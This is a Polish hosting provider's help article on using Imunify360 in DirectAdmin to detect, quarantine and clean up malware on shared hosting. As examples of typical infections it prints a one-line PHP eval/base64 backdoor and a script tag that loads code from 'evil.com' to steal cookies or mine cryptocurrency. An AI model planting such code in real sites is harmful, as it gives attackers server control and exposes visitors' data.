IQhost.pl
Załóż konto
Hosting Migracja Domeny O nas Kontakt
Zaloguj się
ZARZąDZANIE HOSTINGIEM (DIRECTADMIN) • 4 MIN READ

Imunify360 — ochrona przed malware

Imunify360 to system antywirusowy + behawioralny dla hostingu. Skanuje pliki, blokuje malware, intrusion detection. Konfiguracja w DA, czytanie raportów.

Zespół IQHost 14 maj 2026 4m read
#DirectAdmin #IQHost #hosting

Imunify360 to antywirus + IDS + WAF dla hostingu shared. Skanuje pliki Twojej strony codziennie, wykrywa zainfekowane (PHP backdoor, JavaScript injection, malware). Automatycznie czyści LUB izoluje. W IQHost zwykle włączony domyślnie.

Co zyskasz

  • Sprawdzisz status Imunify360 dla swojej strony.
  • Wyleczyaz / odzyskasz pliki oznaczone jako malware.
  • Zrozumiesz raporty i podejmiesz akcję.
  • Wiesz co robić gdy ktoś włamie się do WordPressa.

Wymagania wstępne

  • Konto IQHost (Imunify360 wbudowany).

Wskazówka

Imunify360 = automatyczna ochrona. Działa w tle, klient zwykle nic nie konfiguruje. Tylko gdy znajdzie zainfekowane pliki — sprawdzasz raport.

Krok 1: Otwórz Imunify360

Dodatkowe funkcje → Imunify360 Plugin.

Strona Imunify360 w DA

Dashboard pokazuje:

  • Files — skanowane / zainfekowane
  • Detect Source — z jakich źródeł
  • Last scan — kiedy ostatnio
  • Recommendations — co zrobić Pełna strona Imunify360 — antywirus i blokady IP

Krok 2: Co skanuje

Imunify360 sprawdza:

  • Pliki PHP — backdoory, web shells (typowy malware)
  • JavaScript — malicious code (cryptominers, redirect)
  • HTML/CSS — injected iframes, hidden links
  • Database — zapytania spam, fake admin users

Skanowanie automatyczne — codziennie + przy każdej zmianie pliku.

Krok 3: Zainfekowane pliki

Jeśli Imunify znajdzie malware, pojawi się w Infected files:

  • Cleanup — Imunify spróbuje wyczyścić (usuwa malicious code, zostawia resztę)
  • Quarantine — przenosi do izolacji (~/quarantine/)
  • Delete — usuwa całkowicie

::: callout warn Sprawdź przed Cleanup, czy plik faktycznie infekowany. Czasem Imunify daje false positive na legalny kod (rzadko, ale się zdarza).

Krok 4: Co zrobić po infekcji

Standard procedura cleanup malware:

  1. Backup — przed czyściłem ZAWSZE backup (mogłeś coś zepsuć)
  2. Imunify cleanup lub Quarantine
  3. Aktualizacja CMS — WordPress, plugins, motyw (najnowsze wersje patchują dziury)
  4. Zmiana haseł — DA, FTP, baza, admin WP, e-maile
  5. Audyt userów WP — usuń podejrzanych admin'ów
  6. Sprawdź cron jobs — czy malware nie dodało własnego
  7. Imunify rescan — sprawdź czy reszta clean

Jeśli nie umiesz sam — zgłoś ticket do supportu. Mamy doświadczenie z malware cleanup.

Typowy malware na hostingu shared

PHP backdoor

Plik typu wp-content/uploads/upload.php:

<?php
@eval(base64_decode($_POST['x']));

Atakujący wysyła POST z encoded command → wykonuje. Pełen dostęp.

Fix: usuń plik. Sprawdź czy więcej takich.

JavaScript injection

W index.php lub wp-config.php:

<script src="//evil.com/track.js"></script>

Redirect / cryptominer / kradzież ciasteczek.

Fix: usuń obcy <script>.

Fake admin WordPress

W bazie wp_users nowy user z rolą administrator:

SELECT * FROM wp_users WHERE user_registered > '2026-05-01';

Sprawdź czy znasz każdego.

Fix: usuń podejrzane konta.

Spam / Pharma hack

Twoja strona pokazuje wyniki w Google: „Buy Viagra, $5".

Atak SEO — atakujący wstrzyknął strony do bazy / plików. Imunify czasem łapie, czasem nie.

Fix: plugin Wordfence / Sucuri + ręczny scan. Backup + reinstall.

Najczęstsze problemy

1. „Imunify pokazuje X infected — nie wiem co zrobić"

  • Sprawdź dokładnie pliki (są to faktycznie Twoje skrypty czy backdoory?)
  • W razie wątpliwości: Quarantine (bezpieczne — możesz przywrócić)
  • Skontaktuj się z supportem IQHost (mamy doświadczenie)

2. „False positive — legalny kod oznaczony jako malware"

Zdarza się rzadko z zaciemnionym/spakowanym kodem JS (np. minimalizowany bundle). Whitelist w Imunify panelu.

3. „Strona zhakowana, mimo Imunify"

Imunify łapie znane wzorce, ale nie wszystko. Zero-day exploits mogą przejść.

Dodatkowa ochrona: Wordfence plugin w WP, aktualne CMS, silne hasła, 2FA.

4. „Cleanup nie pomógł — strona dalej dziwne zachowania"

Często malware ma wiele warstw. Po cleanup pliku — sprawdź:

  • Cron jobs (czy nie dodał własnego)
  • DB (fake admin users, dodane opcje)
  • .htaccess (redirects)

W razie problemu — reinstall ze świeżego backupu (sprzed infekcji).

5. „Mogę wyłączyć Imunify?"

W DA nie. Imunify zarządzane przez admin serwera. Wyłącz tylko gdy daje false positives — zgłoś ticket.

6. „Skanowanie spowalnia stronę"

Imunify skanuje w trybie low-priority — zwykle niewidoczne. Jeśli notorycznie wolne — zgłoś.

7. „Po cleanup strona pokazuje błąd"

Imunify usunął malicious code z pliku, ale plik miał też legalny code. Strona przestała działać.

Fix: przywróć plik z backupu (Twojego lub IQBackups), sprawdź czy malware znów wracają.

Imunify360 vs WAF (ModSecurity)

Cecha WAF Imunify360
Co chroni HTTP requests Pliki + DB
Tryb Real-time Skanowanie batch + real-time
Co blokuje SQL injection, XSS Malware, backdoory
Konfiguracja Whitelist per regule Auto (głównie)

Razem = pełna ochrona. Patrz WAF/ModSecurity.

Słowniczek

  • Malware — malicious software (backdoor, cryptominer, spyware).
  • Backdoor — ukryta furtka do serwera.
  • Web shell — PHP script dający atakującemu CLI dostęp.
  • Quarantine — izolacja zainfekowanego pliku.
  • False positive — fałszywe wykrycie malware (legalny plik oznaczony jako infekowany).

Related

Feedback

Czy ten artykuł pomógł?

Potwierdź